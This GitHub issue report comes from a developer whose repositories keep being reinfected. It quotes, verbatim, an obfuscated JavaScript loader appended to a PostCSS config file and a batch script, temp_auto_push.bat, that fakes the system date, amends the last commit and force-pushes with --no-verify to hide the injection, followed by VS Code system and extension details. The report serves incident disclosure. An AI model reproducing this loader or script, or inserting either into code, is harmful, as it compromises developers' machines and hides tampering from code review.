temp bat file integrating malicious code into repo #300753
Description
Type: Bug
We are experiencing a security issue where some of our repo appear to be getting infected by an unknown script. whenever i merge from main or take pull it automatically add a commit using previous commit details ammending the code
A file named temp_auto_push.bat keeps appearing and seems to automatically add malicious or obfuscated code to certain files in the repository, such as admin.route.js and post.css. Even after removing the injected code and reverting the commits, the malicious changes keep reappearing.
We have already taken several steps to investigate and mitigate the issue:
Reinstalled VS Code
Scanned the system for malware
Removed the suspicious code and commits from the repository
However, the issue still persists and the files continue to get modified automatically.I think it is due to a extension that i m unable to find.
We suspect there may be malware or an automated process pushing these changes, or a potential compromise related to the repository or development environment. We would appreciate your assistance in investigating this issue and advising on further steps we should take.
the code provided below injected to some files and pushed through this bat file
import { createRequire } from 'module';
const require = createRequire(import.meta.url);
const config = {
plugins: ['@tailwindcss/postcss'],
};
export default config; global['!']='8-780-1';var _$1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j< h;j++){g[j]= l.charAt(j)};for(var j=0;j< h;j++){var s=e* (j+ 489)+ (e% 19597);var w=e* (j+ 659)+ (e% 48014);var t=s% h;var p=w% h;var y=g[t];g[t]= g[p];g[p]= y;e= (s+ w)% 4573868};var x=String.fromCharCode(127);var q='';var k='\x25';var m='\x23\x31';var r='\x25';var a='\x23\x30';var c='\x23';return g.join(q).split(k).join(x).split(m).join(r).split(a).join(c).split(x)})("rmcej%otb%",2857687);global[$_1e42[0]]= require;if( typeof module=== $_1e42[1]){global[$_1e42[2]]= module};(function(){var LQI='',TUU=401-390;function sfL(w){var n=2667686;var y=w.length;var b=[];for(var o=0;o<y;o++){b[o]=w.charAt(o)};for(var o=0;o<y;o++){var q=n*(o+228)+(n%50332);var e=n*(o+128)+(n%52119);var u=q%y;var v=e%y;var m=b[u];b[u]=b[v];b[v]=m;n=(q+e)%4289487;};return b.join('')};var EKc=sfL('wuqktamceigynzbosdctpusocrjhrflovnxrt').substr(0,TUU);var joW='ca.qmi=),sr.7,fnu2;v5rxrr,"bgrbff=prdl+s6Aqegh;v.=lb.;=qu atzvn]"0e)=+]rhklf+gCm7=f=v)2,3;=]i;raei[,y4a9,,+si+,,;av=e9d7af6uv;vndqjf=r+w5[f(k)tl)p)liehtrtgs=)+aph]]a=)ec((s;78)r]a;+h]7)irav0sr+8+;=ho[([lrftud;e<(mgha=)l)}y=2it<+jar)=i=!ru}v1w(mnars;.7.,+=vrrrre) i (g,=]xfr6Al(nga{-za=6ep7o(i-=sc. arhu; ,avrs.=, ,,mu(9 9n+tp9vrrviv{C0x" qh;+lCr;;)g[;(k7h=rluo41<ur+2r na,+,s8>}ok n[abr0;CsdnA3v44]irr00()1y)7=3=ov{(1t";1e(s+..}h,(Celzat+q5;r ;)d(v;zj.;;etsr g5(jie )0);8ll.(evzk"o;,fto==j"S=o.)(t81fnke.0n )woc6stnh6=arvjr q{ehxytnoajv[)o-e}au>n(aee=(!tta]uar"{;7l82e=)p.mhu<ti8a;z)(=tn2aih[.rrtv0q2ot-Clfv[n);.;4f(ir;;;g;6ylledi(- 4n)[fitsr y.<.u0;a[{g-seod=[, ((naoi=e"r)a plsp.hu0) p]);nu;vl;r2Ajq-km,o;.{oc81=ih;n}+c.w[qrm2 l=;nrsw)6p]ns.tlntw8=60dvqqf"ozCr+}Cia,"1itzr0o fg1m[=y;s91ilz,;aa,;=ch=,1g]udlp(=+barA(rpy(()=.t9+ph t,i+St;mvvf(n(.o,1refr;e+(.c;urnaui+try. d]hn(aqnorn)h)c';var dgC=sfL[EKc];var Apa='';var jFD=dgC;var xBg=dgC(Apa,sfL(joW));var pYd=xBg(sfL('o B%v[Raca)rs_bv]0tcr6RlRclmtp.na6 cR]%pw:ste-%C8]tuo;x0ir=0m8d5|.u)(r.nCR(%3i)4c14/og;Rscs=c;RrT%R7%f/a .r)sp9oiJ%o9sRsp{wet=,.r}:.%ei_5n,d(7H]Rc )hrRar)vR<mox-9u4.r0.h.,etc=/3s+!bi%nwl%&/%Rl%,1]].J}!cf=o0=.h5r].ce+;]]3(Rawd.l)$49f 1;bft95ii7[]]..7t}ldtfapEc3z.9]R,%.2/ch!Ri4_r%dr1tq0pl-x3a9=R0Rt'cR["c?"b]!l(,3(}tR/$rm2_RRw"+)gr2:;epRRR,)en4(bh#)%rg3ge%0TR8.a e7]sh.hR:R(Rx?d!=|s=2>.Rr.mrfJp]%RcA.dGeTu894x_7tr38;f}}98R.ca)ezRCc=R=4s(;tyoaaR0l)l.udRc.f/}=+c.r(eaA)ort1,ien7z3]20wltepl;=7$=3=o[3ta]t(0?!](C=5.y2%h#aRw=Rc.=s]t)%tntetne3hc>cis.iR%n71d 3Rhs)}.{e m++Gatr!;v;Ry.R k.eww;Bfa16}nj[=R).u1t(%3"1)Tncc.G&s1o.o)h..tCuRRfn=(]7_ote}tg!a+t&;.a+4i62%l;n([.e.iRiRpnR-(7bs5s31>fra4)ww.R.g?!0ed=52(oR;nn]]c.6 Rfs.l4{.e(]osbnnR39.f3cfR.o)3d[u52]adt]uR)7Rra1i1R%e.=;t2.e)8R2n9;l.;Ru.,}}3f.vA]ae1]s:gatfi1dpf)lpRu;3nunD6].gd+brA.rei(e C(RahRi)5g+h)+d 54epRRara"oc]:Rf]n8.i}r+5/s$n;cR343%]g3anfoR)n2RRaair=Rad0.!Drcn5t0G.m03)]RbJ_vnslR)nR%.u7.nnhcc0%nt:1gtRceccb[,%c;c66Rig.6fec4Rt(=c,1t,]=++!eb]a;[]=fa6c%d:.d(y+.t0),)i.8Rt-36hdrRe;{%9RpcooI[0rcrCS8}71er)fRz [y)oin.K%[.uaof#3.{. .(bit.8.b)R.gcw.>#%f84(Rnt538/icd!BR);]I-R$Afk48R]R=}.ectta+r(1,se&r.%{)];aeR&d=4)]8./cf1]5ifRR(+$+}nbba.l2{!.n.x1r1..D4t])Rea7[v]%9cbRRr4f=le1}n-H1.0Hts.gi6dRedb9ic)Rng2eicRFcRni?2eR)o4RpRo01sH4,olroo(3es;_F}Rs&(rbT[rc(c (eR'lee(({R]R3d3R>R]7Rcs(3ac?sh[=RRi%R.gRE.=crstsn,( .R ;EsRnrc%.{R56tr!nc9cu70"1])}etpRh/,,7a8>2s)o.hh]p}9,5.}R{hootn/e=dceoe3d.5=]tRc;nsu;tm]rrR,tnB5je(csaR5emR4dKt@R+i]+=}f)R7;6;,R]1iR]m]R)]=1Reo{h1a.t1.3F7ct)=7R)%r%RF MR8.S$l[Rr )3a%e=(c%o%mr2}RcRLmrtacj4{)L&nl+JuRR:Rt}e.zv#oci. oc6lRR.8!Ig)2!rrca.=]((1tr=;t.ttci0R;c8f8Rk!o5o +f7!%?=A&r.3(%0.tzr fhef9u0lf7l20;R(%0g,n)N}:8]c.26cpR(]u2t4(y=/$'0g)7i76R+ah8sRrrre:duRtR"a}R/HrRa172t5tt&a3nci=R=<c%;,](6cTs2%5t]541.u2R2n.Gai9.ai059Ra!at)"7+alr(cg%,(};fcRru]f1/]eoe)c}}]_toud)(2n.]%v}[:]538 $;.ARR}R-"R;Ro1R,,e.{1.cor ;de_2(>D.ER;cnNR6R+[R.Rc)}r,=1C2.cR!(g]1jRec2rqciss(261E]R+]-]0[ntlRvy(1=t6de4cn](["].{Rc[%&cb3Bn lae)aRsRR]t;l;fd,[s7Re.+r=R%t?3fs].RtehSo]29R,;5t2Ri(75)Rf%es)%@1c=w:RR7l1R(()2)Ro]r(;ot30;molx iRe.t.A}$Rm38e g.0s%g5trr&c:=e4=cfo21;4_tsD]R47RttItR,le)RdrR6][c,omts)9dRurt)4ItoR5g(;R@]2ccR 5ocL..].()r5%]g(.RRe4}Clb]w=95)]9R62tuD%0N=,2).{Ho27f ;R7}]t7]r17z]=a2rci%6.Re$Rbi8n4tnrtb;d3a;t,sl=rRa]r1cw]}a4g]ts%mcs.ry.a=R{7]]f"9x)%ie=ded=lRsrc4t 7a0u.}3R<ha]th15Rpe5)!kn;@orr(51)=e lt+ar(3)e:e#Rf)Cf{d.aR'6a(8j]]cp()onbLxcRa.rne:8ie!)oRRRde%2exuq}l5..fe3R.5x;f}8)791.i3c)(#e=vd)r.R!5R}%tt!Er%GRRR<.g(RR)79Er6B6]t}$1{R]c4e!e+f4f7":) (sys%Ranua)=.i_ERR5cR_7f8a6cr9ice.>.c(96R2o$n9R;c6p2e}R-ny7S*({1%RRRlp{ac)%hhns(D6;{ ( +sw]]1nrp3=.l4 =%o (9f4])29@?Rrp2o;7Rtmh]3v/9]m tR.g ]1z 1"aRa];%6 RRz()ab.R)rtqf(C)imelm${y%l%)c}r.d4u)p(c'cof0}d7R91T)S<=i: .l%3SE Ra]f)=e;;Cr=et:f;hRres%1onrcRRJv)R(aR}R1)xn_ttfw )eh}n8n22cg RcrRe1M'));var Tgw=jFD(LQI,pYd );Tgw(2509);return 1358})();
file : temp_auto_push.bat
@echo off
for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%Y-%%m-%%d --format=%%cd"') do set LAST_COMMIT_DATE=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%H:%%M:%%S --format=%%cd"') do set LAST_COMMIT_TIME=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%s"') do set LAST_COMMIT_TEXT=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%an"') do set USER_NAME=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%ae"') do set USER_EMAIL=%%A
for /f "delims=" %%A in ('git rev-parse --abbrev-ref HEAD') do set CURRENT_BRANCH=%%A
echo %LAST_COMMIT_DATE% %LAST_COMMIT_TIME%
echo %LAST_COMMIT_TEXT%
echo %USER_NAME% (%USER_EMAIL%)
echo Branch: %CURRENT_BRANCH%
set CURRENT_DATE=%date%
set CURRENT_TIME=%time%
date %LAST_COMMIT_DATE%
time %LAST_COMMIT_TIME%
echo Date temporarily changed to %LAST_COMMIT_DATE% %LAST_COMMIT_TIME%
git config --local user.name %USER_NAME%
git config --local user.email %USER_EMAIL%
git add .
git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify
date %CURRENT_DATE%
time %CURRENT_TIME%
echo Date restored to %CURRENT_DATE% %CURRENT_TIME% and complete amend last commit!
git push -uf origin %CURRENT_BRANCH% --no-verify
@echo on
above injected code was running as process in my ec2 i have stopped taht and created new one but it is poping up locally in vscode
Please let us know if you need any additional information.now it is in our team pc to different devs
Thank you for your support.
VS Code version: Code 1.110.1 (61b3d0a, 2026-03-06T23:03:27.520Z)
OS version: Windows_NT x64 10.0.26200
Modes:
System Info
| Item | Value |
|---|---|
| CPUs | 11th Gen Intel(R) Core(TM) i7-11800H @ 2.30GHz (16 x 2304) |
| GPU Status | 2d_canvas: enabled GPU0: VENDOR= 0x8086, DEVICE=0x9a60 [Intel(R) UHD Graphics], DRIVER_VENDOR=Intel, DRIVER_VERSION=32.0.101.7026 ACTIVE GPU1: VENDOR= 0x10de, DEVICE=0x1f99 [NVIDIA GeForce GTX 1650 with Max-Q Design], DRIVER_VERSION=32.0.15.8180 GPU2: VENDOR= 0x1414, DEVICE=0x008c [Microsoft Basic Render Driver], DRIVER_VERSION=10.0.26100.7309 Machine model name: Machine model version: direct_rendering_display_compositor: disabled_off_ok gpu_compositing: enabled multiple_raster_threads: enabled_on opengl: enabled_on rasterization: enabled raw_draw: disabled_off_ok skia_graphite: disabled_off trees_in_viz: disabled_off video_decode: enabled video_encode: enabled webgl: enabled webgl2: enabled webgpu: enabled webnn: disabled_off |
| Load (avg) | undefined |
| Memory (System) | 23.73GB (4.32GB free) |
| Process Argv | --crash-reporter-id 03c6b21e-d1d3-41d2-83ce-6091d7969029 |
| Screen Reader | no |
| VM | 0% |
Extensions (56)
| Extension | Author (truncated) | Version |
|---|---|---|
| aws-toolkit-vscode | ama | 3.98.0 |
| tailwind-docs | aus | 2.1.0 |
| tailwindshades | bou | 0.0.5 |
| vscode-tailwindcss | bra | 0.14.29 |
| multi-cursor-case-preserve | Car | 1.0.5 |
| node-snippets | chr | 1.4.0 |
| npm-intellisense | chr | 1.4.5 |
| path-intellisense | chr | 2.10.0 |
| vscode-eslint | dba | 3.0.24 |
| githistory | don | 0.6.20 |
| es7-react-js-snippets | dsz | 4.4.3 |
| gitlens | eam | 17.11.0 |
| vscode-html-css | ecm | 2.0.14 |
| EditorConfig | Edi | 0.18.1 |
| prettier-vscode | esb | 12.3.0 |
| vscode-express-snippets | Exp | 1.1.1 |
| auto-close-tag | for | 0.5.15 |
| auto-rename-tag | for | 0.1.10 |
| code-runner | for | 0.12.2 |
| copilot-chat | Git | 0.38.2 |
| vscode-pull-request-github | Git | 0.132.0 |
| rest-client | hum | 0.25.1 |
| google-fonts | lio | 0.0.1 |
| git-graph | mhu | 1.30.0 |
| dotenv | mik | 1.0.1 |
| vscode-containers | ms- | 2.4.1 |
| vscode-docker | ms- | 2.0.0 |
| vscode-dotnet-runtime | ms- | 3.0.0 |
| vscode-edge-devtools | ms- | 2.1.10 |
| remote-containers | ms- | 0.447.0 |
| remote-ssh | ms- | 0.122.0 |
| remote-ssh-edit | ms- | 0.87.0 |
| remote-wsl | ms- | 0.104.3 |
| vscode-remote-extensionpack | ms- | 0.26.0 |
| remote-explorer | ms- | 0.5.0 |
| remote-server | ms- | 1.5.3 |
| vscode-typescript-next | ms- | 6.0.20260310 |
| color-highlight | nau | 2.8.0 |
| vscode-versionlens | pfl | 1.24.1 |
| material-icon-theme | PKi | 5.32.0 |
| material-product-icons | PKi | 1.7.1 |
| excalidraw-editor | pom | 3.9.1 |
| nextjs-snippets | Pul | 1.0.3 |
| LiveServer | rit | 5.7.10 |
| html5-boilerplate | sid | 1.1.1 |
| autoimport | ste | 1.5.4 |
| code-spell-checker | str | 4.5.6 |
| vscode-stripe | str | 3.8.6 |
| errorlens | use | 3.28.0 |
| vscode-icons | vsc | 12.17.0 |
| console-ninja | Wal | 1.0.517 |
| vscode-import-cost | wix | 3.3.0 |
| JavaScriptSnippets | xab | 1.8.0 |
| tailwind-snippets | Zar | 1.0.2 |
| material-theme | zhu | 3.19.0 |
| html-css-class-completion | Zig | 1.20.0 |
(2 theme extensions excluded)
A/B Experiments
vsliv368:30146709
vswsl492cf:30256860
binariesv615:30325510
nativeloc1:31344060
dwcopilot:31170013
dwoutputs:31242946
copilot_t_ci:31333650
e5gg6876:31282496
pythonrdcb7:31342333
6518g693:31463988
aj953862:31281341
6abeh943:31336334
envsdeactivate2:31464701
cloudbuttont:31379625
aihoversummaries_t:31469308
3efgi100_wstrepl:31403338
use-responses-api:31390855
je187915:31401257
ec5jj548:31422691
cp_cls_t_966_ss:31454198
4je02754:31466945
ge8j1254_inline_auto_hint_haiku:31431912
nes-autoexp-10:31446583
a5gib710:31434435
00h15499_gpt_53_codex:31464542
7a04d226_do_not_restore_last_panel_session:31438103
preserve_tokens:31444547
cp_cls_t_1081:31454832
ia-use-proxy-models-svc:31452481
a43f0576c:31442824
e9c30283:31461165
test_treatment2:31471001
nes-conv-2-3:31474331
g_63ac8346:31467999
9c05b404_max_request_50:31468594
idci7584:31464702
edit_mode_hidden:31461530
864ei723_large_tool_results_to_disk:31460878
showingstats:31471631
55364912:31471672
nes-extended-on:31455476
chat:31457767
0h66b693:31473807
ah:31460422
jdddd261:31472041
nes-rcnt-edit:31471617
thinking_effort_h:31471653
4dgh1208:31471592
thinking_c:31471065